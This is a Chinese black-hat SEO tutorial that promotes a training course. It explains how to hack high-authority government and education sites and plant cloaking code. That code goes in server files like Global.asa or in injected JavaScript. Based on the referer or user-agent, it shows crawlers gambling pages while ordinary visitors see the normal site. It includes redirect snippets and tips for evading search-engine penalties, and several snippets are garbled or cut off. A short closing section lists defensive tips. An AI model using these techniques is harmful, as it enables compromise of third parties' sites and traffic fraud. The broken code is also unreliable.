黑帽seo:网页劫持详解
网页劫持是目前黑帽SEO技术或者说黑产最喜欢的一种网页引流方式,此手法往往通过入侵政fu、事业单位、协会社团、教育机构网站(权重高),修改网站源代码、放寄生虫程序、设置二级目录反向代理等实现。网页劫持可以分为服务端劫持、客户端劫持、百度快照劫持、百度搜索劫持等等;表现形式可以是劫持跳转,也可以是劫持呈现的网页内容,目前被广泛应用于SF、B.C等暴利行业。
由于目前搜索引擎对于js代码还没有办法完全识别,因此也就出现了利用js代码跳转的黑帽SEO技术手法。现在网上有关js跳转代码比比皆是,但是作为黑帽的seo手法之一,如何做到有效降低跳转的网站被k风险,这才是我们需要研究的一个方向,我们的内部课程有详细的讲解和代码。下面简单分享一下。js劫持主要有“服务器劫持”以及“用户端劫持”两种。
网站劫持是一个相对古老的技术,但是随着时间的推移也发展处很多的变种类代码。
一、实现网站劫持如以下步骤所示:
1、入侵相关网站;
2、然后在网站中插入JS或修改其配置文件,增加相应的劫持代码。另外一般会加入判断条件,判断条件一般会根据user-agent或referer进行判断。大多数判断条件会判断是爬虫还是用户,如果是用户会返回正常的网站;如果是爬虫,会返回相关菠菜、娱乐类等黑客设置好的网站;
3、爬虫去访问时,返回是相关菠菜、娱乐类网站,导致收录的是黑客精心准备好的网站;
4、黑帽SEO基本上都是给爬虫收录的,对于正常的人工访问会返回正常的内容,所以导致这种网站很难发现、并且其存留时间相对较长。
二、网站劫持检测
1、检测网站是否被劫持
2、域名是否被墙
3、DNS污染检测
4、网站打开速度检测
5、网站是否被黑、被入侵、被改标题、被挂黑链
【深度检测】
1、可以检测多层js劫持、图片劫持、FLASH劫持、地区电信劫持、DNS劫持、域名被墙、DNS污染。
2、可以获取严重占用加载时间的JS或者图片、css等html所用文件。
3、搜索引擎快照劫持检测。
三、网页劫持的分类:
1:服务端劫持
服务器劫持也称为全局劫持,以修改网站动态语言文本,判断访问来源控制返回内容,从来达到网站劫持的目的。服务端劫持的判断方法:可以通过观察网站后端代码,或者通过改变ip,抓包等方式,观察放回源码是否不同。也就是改变了每次访问网页从服务端获取到的网页代码。
手法为修改网站动态语言文本,判断访问来源控制返回内容,从来达到网站劫持的目的。
2:asp/aspx/php劫持
Global.asa、Global.asax、conn.asp、conn.php等文件比较特殊,作用是在每次执行一个动态脚本的时候,都会先加载该脚本, 然后再执行目标脚本。所以只要在 Global.asa 中写判断用户系统信息的代码(访问来源等),如果是蜘蛛访问则返回关键词网页(想要推广的网站),如果是用户访问,则返回正常页面。
3:客户端劫持
客户端劫持的手法也很多,但主要就是2种:Header劫持、js劫持。用户端劫持的判断方法:只需观察浏览器呈现的网页前端代码,查看是否引用了不当的js,或者其它敏感内容。每次访问网页从服务端获取到的网页代码都是相同的,只是控制了网页代码在浏览器中呈现的效果(比如是否进行跳转等)。
1,header劫持
主要作用是:利用的就是Meta Refresh Tag(自动转向),将流量引走。
可以在源代码中写入以下代码:
代码:
2,js劫持
js劫持目的:通过向目标网页植入恶意js代码,控制网站跳转、隐藏页面内容、窗口劫持等。
js植入手法:可以通过入侵服务器,直接写入源代码中;也可以写在数据库中,因为有些页面会呈现数据库内容。
js劫持案例
效果:通过搜索引擎搜索点击页面(执行一段js)跳转到菠菜页面;直接输入网址访问网页,跳转到404页面。
代码:
[代码]js代码:
today=new Date();
today=today.getYear()+"-"+(today.getMonth()+1)+"-"+today.getDate();
var regexp=/\.(sogou|so|haosou|baidu|google|youdao|yahoo|bing|gougou|118114|vnet|360|ioage|sm|sp)(\.[a-z0-9\-]+)\//ig;
var where =document.referer;
if(regexp.test(where)){
document.write ('');
}
else
{
window.location.href="../../404.htm";
}
分析:通过referer判断来路,如果referer来路为空就是跳转到404页面,如果是搜索引擎来的referer里面也会有显示,然后在写代码控制跳转。如果只是控制实现显示不同的内容,可以修改php、asp代码;如果需要劫持搜索引擎搜索框,可以写JS代码来做浏览器本地跳转。当然js功能可以无限扩展,比如可以控制一个ip一天内第一次访问正常,其余访问跳转等等。
四、比较有效的防k站js代码
如何有效防止或者延长网站被k的js代码,我们黑帽盒子SEO培训基地内部课程有详细的几种方式代码。现在简单举例一种,方法是把pc端和手机端分开写入js代码,来实现跳转。应用方法:加入一个Javascript源文件(以js为扩展名),将以下代码添加在里面,文件命名为tz,然后在网页下插入:
js代码:
网页pc端跳转
大家都知道,我们网站无论是整站优化还是单个页面,当关键词排名在首页时,做黑帽手法的网站就可以考虑做跳转到目标页面了。为了获取快速排名,所以做的页面也大部分考虑给搜索引擎看,应尽量做好内容的可读性和规避相似度,来满足搜索引擎需求,这样关键词就会很快上首页了。之后再做一个用户体验度较好的页面,把流量自然跳转到该页面,这样也就达到目的了。
代码如下:
js代码:
document.writeln("document.write(\"\");");
document.writeln("document.write(\"\");");
document.writeln("document.write(\"\");");
document.writeln("");
道理和pc端一样,我这里就不啰嗦了。代码如下:
[代码]js代码:
if(/Andorid|webOS|iPod|BlackBerry|Windows Phone/i.test(navigator.userAgent)){
if(window.location.href.indexOf("?pc")
catch(e){}}}
值得注意的是,为了降低被k风险,我们做跳转页的时候尽量使主题和关键词一致,内容则以引导性为主,页面尽量优化好一点,提高用户体验度和降低跳出率,经测试此方法网站不容易被k,排名也比较稳定,当然,大家需要根据自己的实际情况来操作。
五、推荐黑帽seo劫持手法
就是:通过快排一些网站上排名然后JS劫持流量到主站做排名。
那肯定你们会问,为什么这么大费周章不直接就去快排主站算了。
因为主站不能被K,而快排站无所谓,说明一下,百度蜘蛛现在是不能识别JS代码的,一旦惩罚,主站不会被牵连,而且这种手法成熟,快排站与主站做的行业和关键词都一致,一旦跳转,主站的流量来源都会是行业关键词,想法很好。
好了,点到为止,希望能给你们一点帮助,最后奉上JS代码。
[代码]js代码:
document.writeln("");
document.writeln("document.write(\"\");");
document.writeln("document.write(\"\");");
document.writeln('document.write("");');
document.writeln(" /script>");
客户端劫持与服务端区别
客户端劫持:每次访问网页从服务端获取到的网页代码都是相同的,只是控制了网页代码在浏览器中呈现的效果(比如是否进行跳转等)。
服务端劫持:改变了每次访问网页从服务端获取到的网页代码。
客户端劫持与服务端判断方法
客户端劫持的判断方法:只需观察浏览器呈现的网页前端代码,查看是否引用了不当的js,或者其它敏感内容。
服务端劫持的判断方法:可以通过观察网站后端代码,或者通过改变ip,包头等方式,观察放回源码是否不同。
六、网站被黑客挂马劫持预防小技巧
做好网站建设安全维护绝对不是一件一帆风顺的事,都需要专业人员定期对网站进行安全做检查,尤其是对于人们口中所说的挂马、病毒、快照劫持、网站被黑等现象。为了防止出现这类危害,一定要做好预防,预防措施如何做?这也是今天东莞黑帽SEO培训大神给大家分享的知识点,如果处理不当网站出现问题了对于维护也是十分困难的,下面东莞黑帽SEO培训大神介绍下这些网站被黑客挂马劫持预防小技巧。
一、服务器方面
建议用Linux服务器,不要用Windows服务器,Linux服务器的漏洞比Windows少很多。服务器上面安装相应的安全防护软件比如安全狗、云锁、D盾等。
二、程序维护方面
对于网站建设中所需要的程序一定要通过正规途径去下载,避免出现不正规程序影响网站运做与安全。
注重程序的更新,保持网站程序是最新的版本,因为新版本不仅更加能够对付各种病毒而且还能够保护网站数据不受损坏。
三、数据维护方面
为了网站避免发生一些不必要的威胁,所以,用户应该把自己的数据库资料进行备份。
四、密码安全
网站管理员密码不要使用弱口令,定期更换。网站后台登录地址不能使用默认的,同时网站各个目录权限设定好,定期对网站进行安全检测,最好能使用一些查毒工具维护网站安全。